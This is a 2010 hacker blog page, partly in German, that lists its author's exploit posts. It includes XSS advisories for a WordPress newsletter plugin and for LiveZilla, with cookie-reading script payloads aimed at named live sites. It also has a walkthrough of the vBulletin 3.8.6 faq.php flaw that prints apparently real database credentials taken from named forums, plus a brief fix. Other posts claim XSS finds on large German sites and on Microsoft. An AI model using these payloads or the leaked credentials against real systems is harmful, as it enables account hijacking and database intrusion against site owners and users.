WordPress Newsletter Plugin – Cross Site Scripting (XSS) Vulnerabilities

Posted by bursali | Posted in Exploits | Posted on 25.07.2010 @ 11:17:04

1 Star2 Stars3 Stars4 Stars5 Stars (4 votes, average: 3.75 out of 5)
Loading ... Loading ...

6

As HTML File: Click here..

	.o8                                               oooo   o8o
	"888                                               `888   `"'
	888oooo.  oooo  oooo  oooo d8b  .oooo.o  .oooo.    888  oooo
	d88' `88b `888  `888  `888""8P d88(  "8 `P  )88b   888  `888
	888   888  888   888   888     `"Y88b.   .oP"888   888   888
	888   888  888   888   888     o.  )88b d8(  888   888   888
	`Y8bod8P'  `V88V"V8P' d888b    8""888P' `Y888""8o o888o o888o 

########################### INFORMATIONS ##################################
#
#
# [+] Exploit Title: WordPress Newsletter Plugin - Cross Site Scripting
Vulnerabilities
# [+] Date: 25-07-2010
# [+] Author: bursali | admin[at]bursali.eu | www.bursali.eu
# [+] Software Link: http://tribulant.com/products/view/1/wordpress-mailing-list
# [+] Price: $49.99
# [+] Version: v3.8.3 & older versions
# [+] Tested on: PHP
# [+] Dork: Use your brain (;
#
# [?] Greetz to: GabberGandalf, fred777, J0hn.X3r, Montaxx, DeeWayne,
#		 Nazrek, gf0x, Sawyer, VeN0m, Lidloses_Auge, Suicide, Toastbrot,
#		 Dexx, enco, soulstoned, HooHead, Cyb3r P1rat, DizzY_D, Free-Hack,
#		 and the wh0le other morons ;D
#
#
###################################################################################

########################## Exploit #############################

The "EMail Address"-Form is vulnerable.

Example:

Put your XSS Code into the EMail Field and add quotation mark before you XSS code. (;

Live Example:

-> Go to: http://wpml.wpplugins.biz/
-> Put that into the EMail Field: "< script>alert(document.cookie)< /script>
-> Remove spaces.
-> *-*

########################## LAST WORDS #############################

Visit www.bursali.eu - Home of the CyberTerrorist <3
~bursali 

#####
Share|

Read More

vBulletin® 3.8.6 faq.php Vulnerability

Posted by bursali | Posted in Exploits | Posted on 22.07.2010 @ 11:42:32

1 Star2 Stars3 Stars4 Stars5 Stars (4 votes, average: 4.50 out of 5)
Loading ... Loading ...

9

Habe gerade einen interessanten Beitrag von J0hn.X3r in meinem RSS Fach gefunden. (:
Es ist wirklich erstaunlich, wie der Jelsoft Enterprises Ltd. so ein leichtsinniger Fehler unterlaufen ist.

Ist vllt schon dem ein oder anderen bekannt, aber ich find das echt interessant, dass einer großen und maechtigen Forensoftware wie vBulletin der Fehler unterlaufen kann, dass die MySQL Zugangsdaten fuer jede beliebige Person sichtbar werden kann.

Die Luecke wurde heute nachmittag veroeffentlicht und vBulletin reagierte mit einem Patch darauf.

Die faq.php wurde nur indirekt davon betroffen und dient eher als “Ausgabe”, da ein Fehler in den phrases dafuer verantwortlich war.

Wo befindet sich die Luecke?

Schauen wir uns mal die /install/vbulletin-language-de-du.xml Datei an und suchen nach “database_ingo” – was finden wir? Ah, interessant:

1
2
3
4
5

<phrase name="database_ingo" date="1277901074" username="Adduco" version="3.8.6"><![CDATA[Datenbank-Name: {$vbulletin->config['Database']['dbname']}<br />
Datenbank-Server: {$vbulletin->config['MasterServer']['servername']}<br />
Datenbank-Port: {$vbulletin->config['MasterServer']['port']}<br />
Datenbank-Benutzername: {$vbulletin->config['MasterServer']['username']}<br />
Datenbank-Kennwort: {$vbulletin->config['MasterServer']['password']}]]></phrase>

Es werden uns also unsere MySQL Datenbank Daten ausgegeben.

In der englischen Version sieht das ganze aehnlich aus /install/vbulletin-language.xml line 3701:

1
2
3
4
5

<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']}<br />
Database Host: {$vbulletin->config['MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['MasterServer']['port']}<br />
Database Username: {$vbulletin->config['MasterServer']['username']}<br />
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>

Wie nutze ich das nun aus?

Wir suchen uns ein Forum, welches von dieser Luecke betroffen ist, klicken oben auf “Hilfe”/”FAQ”, geben bei “Suchbegriffe” bzw. “Search Word(s):” dann “Datenbank” (bzw. database) ein und sehen dann, aha, erster Treffer:

Datenbank-Name: vbulletin
Datenbank-Server: localhost
Datenbank-Port: 3306
Datenbank-Benutzername: root
Datenbank-Kennwort: my4moo

Bzw. auf nem englischen Board:

Database Name: pro_astrogaming_com
Database Host: localhost
Database Port: 3306
Database Username: pro_astrogaming
Database Password: gitl0st

Screenshot

Auf das, was man damit anfangen kann, brauche ich denk ich nicht weiter drauf eingehen.

Wie schuetze ich mich davor?
Wie oben bereits gepostet durch einen Patch von der offiziellen vBulletin Seite, oder durch ein MySQL Query:

1

DELETE FROM `vb_phrase` WHERE `varname`='database_ingo'

Soviel dazu erstmal, wuensch euch noch eine schoene Woche :D

Danke für diesen interessanten Beitrag J0hn.X3r (:
Quelle..

Mit freundlichen Grüßen
~bursali

Share|

Read More

[XSS] t-online.de Shop

Posted by bursali | Posted in XSS | Posted on 18.06.2010 @ 12:00:16

1 Star2 Stars3 Stars4 Stars5 Stars (8 votes, average: 3.13 out of 5)
Loading ... Loading ...

2

Mail ist schon raus. (;

Greetz
~bursali

Share|

Read More

[XSS] Microsoft – Exchange Page

Posted by bursali | Posted in XSS | Posted on 07.06.2010 @ 16:26:00

1 Star2 Stars3 Stars4 Stars5 Stars (6 votes, average: 4.33 out of 5)
Loading ... Loading ...

7

Mail ist schon raus. (;

www.ImageBanana.net - ms1.PNG
www.ImageBanana.net - ms2.PNG

Mit freundlichen Grüßen
~bursali

Share|

Read More

LiveZilla 3.1.8.6 – Cross Site Scripting (XSS) Vulnerability

Posted by bursali | Posted in Exploits | Posted on 27.05.2010 @ 18:22:42

1 Star2 Stars3 Stars4 Stars5 Stars (3 votes, average: 5.00 out of 5)
Loading ... Loading ...

0

As HTML File: Click here..

	.o8                                               oooo   o8o
	"888                                               `888   `"'
	888oooo.  oooo  oooo  oooo d8b  .oooo.o  .oooo.    888  oooo
	d88' `88b `888  `888  `888""8P d88(  "8 `P  )88b   888  `888
	888   888  888   888   888     `"Y88b.   .oP"888   888   888
	888   888  888   888   888     o.  )88b d8(  888   888   888
	`Y8bod8P'  `V88V"V8P' d888b    8""888P' `Y888""8o o888o o888o

########################### INFORMATIONS #######################################
#
#
# [+] Exploit Title: LiveZilla 3.1.8.6 - Cross Site Scripting (XSS) Vulnerability
# [+] Date: 25-05-2010
# [+] Author: bursali | admin[at]bursali.eu | www.bursali.eu
# [+] Software Link: http://www.livezilla.net/
# [+] Version: 3.1.8.6
# [+] Tested on: PHP
# [+] Dork: Use your brain (;
#
# [?] Greetz to: GabberGandalf, fred777, J0hn.X3r, Montaxx, Dexx, DeeWayne,
#                Nazrek, Sawyer, VeN0m, Lidloses_Auge, Suicide, Toastbrot,
#		 soulstoned enco, DizzY_D, Zikke, n0ne-crew, Free-Hack
#		 and the wh0le other morons ;D
#
#
#################################################################################

########################## Exploit #############################

It's a basic Cross Site Scripting Vulnerability (;

Example:
http://[server]/[Livezilla Directory]/server.php?request=track&
output=jcrpt&code=[XSS]&nse=

Live Example:

http://www.livezilla.net/livezilla/server.php?request=track&

output=jcrpt&code=%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&nse=

########################## LAST WORDS #############################

Visit www.bursali.eu - Home of the CyberTerrorist <3
~bursali

#####
Share|

Read More

[Multiple XSS] wieistmeineip.de

Posted by bursali | Posted in XSS | Posted on 18.05.2010 @ 20:50:24

1 Star2 Stars3 Stars4 Stars5 Stars (1 votes, average: 0.00 out of 5)
Loading ... Loading ...

5

Sehr nett die Leute. Hauptsache Lücken gefixxt aber nicht mal bedankt.
Hätte Ich nicht erwartet Computerbild Jungs. -.-
Ein Abonnent weniger (;




Mit freundlichen Grüßen
~bursali

Share|

Read More
<< Previous
Mail
Twitter
YouTube